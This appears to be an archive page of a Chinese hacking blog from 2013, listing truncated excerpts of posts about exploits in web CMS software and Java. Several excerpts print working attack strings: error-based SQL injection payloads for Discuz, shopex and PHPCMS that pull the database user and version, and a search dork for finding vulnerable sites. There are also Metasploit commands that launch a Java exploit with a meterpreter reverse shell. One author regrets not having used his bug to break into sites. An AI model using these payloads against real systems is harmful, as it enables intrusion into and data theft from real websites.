本博客只做技术文章、工具的收藏!

feed订阅 新浪微博 你好,欢迎光临! 

Category Archives: 漏洞收集

wordpress缓存插件远程代码执行漏洞的利用

2013.04.26 , , No Comments ,

存在漏洞的插件名称及版本: 1.wp-super-cache 1.3以下版本 2.w3-total-cache 0.9.2.9以下版本 这两个插件的漏洞官方已经修复..... 漏洞原理是缓存插件在生成一个页面的新缓存时,解析了PHP代码片段。我们将PHP代码写入到目标的文章评论中,当缓存更新后,就可实现插入后门等行为。 两种插件都已测试,都能成功.... 利用方法: ...

Discuz交友插件漏洞附EXP

2013.04.17 , , 2 Comments ,

DZ交友插件漏洞jiaoyou.php?pid=1 有的注入需要登录,注入代码如下: ' or @`'` and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(user())),0x27,0x7e)) from information_schema.tab...

maccms 存储xss 分析

2013.04.16 , , No Comments ,

# Team:c0deplay gbk utf8 最新版本 的存储xss 分析 问题出在 plus/comment/index.php 页面 留言添加功能 function add() // 这里其实可以用到宽字符的 sql注入的 没跟进 $c_content= iconv( ’UTF-8′, ’gb2312//IGNORE’ , $c_content); $c_na...

代码审计:dedecms本地文件包含及物理路径泄露0day[转]

2013.03.29 , , No Comments ,

晚餐吃撑了,瞄下代码消化消化。最近Php0day群里的兄弟都在讨论dede洞多,赶紧下了套,用editplus搜索了几个关键字,果然发现些问题。(话说平时写代码也喜欢用editplus,小巧方便多年习惯) 出现漏洞的两个文件为: Include/payment/alipay.php Include/payment/yeepay.php 漏洞均出现在respond方法里...

[转]N点商业版通杀0day 以及利用方法

2013.03.5 , , 1 Comment ,

作者:qingran 作者网站:www.qingran.me 首先百度搜索关键字:inurl: (mmdatabase.asp) 我随便列举一个:   www.xxxx.com 修改链接:http://www.xxxx.com:80/Style/news.asp?action=true&RID=1&ID=1 扔入NBSI 或者啊D等各种傻逼工具中 SQ...

新年礼物:shopex通杀注入两处

2013.02.4 , , No Comments ,

http://www.x.cn/index.php?comment-822'/**/and/**/'1'='1-ask-commentlist.html http://www.x.com/comment-8967'/**/and/**/ExtractValue(0x64,concat(0x01,(select/**/@@version)))/**/order/**/b...

PHPCMS_V9注入0DAY___EXP已构造

2013.02.2 , , 1 Comment ,

PHPCMS_V9注入0DAY___EXP 漏洞来源:土司:https://www.t00ls.net/thread-21894-1-1.html EXP构造:haxsscker 土司只给了张烂图- -没给语句……那我就自己构造吧…… 本人构造结果如下: %60userid%60%3D%28select+1+from%28select+count%28%2A%29...

Thinksns 2.8 文件上传漏洞分析&完美利用

2013.01.31 , , 1 Comment ,

一. Thinksns简介 ThinkSNS(简称TS),是智士软件开源的开源微博、社交网络平台。采用PHP+MySQL技术平台,微博+应用的产品模式,通过应用、插件、风格包等丰富的机制来扩展功能,同时支持多种常见浏览器和移动客户端。拥有iphone、android客户端以及适合手机浏览的wap版界面,是建立社交网站、微博平台、移动互联网创业的首选二次开发平台。 Th...

[通杀]dedecms plus/search.php 注入漏洞利用方式

2013.01.19 , , No Comments ,

哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站  放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。 既然已经发出来了,我就把我自己搞的exp发下吧。。唉。 我一般是这样测试的: 提交 xx.com/plus/search.php?keyword=as&typeArr[1 uNion 1]=a 转...

[更新]新年初始,Java惊爆首个0day

2013.01.11 , , No Comments ,

use exploit/multi/browser/java_jre17_jmxbean set SRVHOST 192.168.178.26 set TARGET 1 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.26 exploit sysinfo getu...